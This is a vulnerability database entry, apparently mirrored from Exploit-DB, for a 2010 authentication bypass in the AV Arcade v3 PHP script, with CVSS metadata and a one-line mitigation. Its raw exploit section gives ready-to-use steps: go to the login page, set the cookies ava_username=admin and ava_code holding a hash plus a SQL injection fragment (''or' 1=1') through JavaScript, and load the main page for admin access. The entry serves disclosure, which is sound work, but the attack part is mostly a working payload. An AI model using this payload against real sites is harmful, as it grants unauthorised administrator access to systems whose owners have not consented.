AV Arcade v3 Auth Bypass / Cookie

vendor:

AV Arcade

by:

saudi0hacker

7,5

CVSS

HIGH

Auth Bypass / Cookie

287

CWE

Product Name: AV Arcade

Affected Version From: 3.0

Affected Version To: 3.0

Patch Exists: NO

Related CWE: N/A

CPE: av_arcade_v3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

AV Arcade v3 Auth Bypass / Cookie

An attacker can bypass authentication by setting a cookie with the username set to 'admin' and the code set to 'c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;'

Mitigation:

Ensure that authentication credentials are properly validated and that cookies are not used to bypass authentication.

Source

Exploit-DB raw data:

:----------------------------------------------------------------------------:
: # Software      : AV Arcade v3   [PHP]                                     :
: # Site          : www.avscripts.net                                        :
: # Date          : 28/07/2010                                               :
: # Author        : saudi0hacker                                             :
: # Type          : Auth Bypass / Cookie                                     :
: # Greetz to     : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
:----------------------------------------------------------------------------:

[1] Go to the URL:
    http://www.xxxxx.net/index.php?task=login

[2] Apply these Cookie:

    Javascript:document.cookie = "ava_username=admin;"
    Javascript:document.cookie = "ava_code=c4ca4238a0b923820dcc509a6f75849b 'or' 1=1;"

[3] Go to main Page:

[4] Enjoy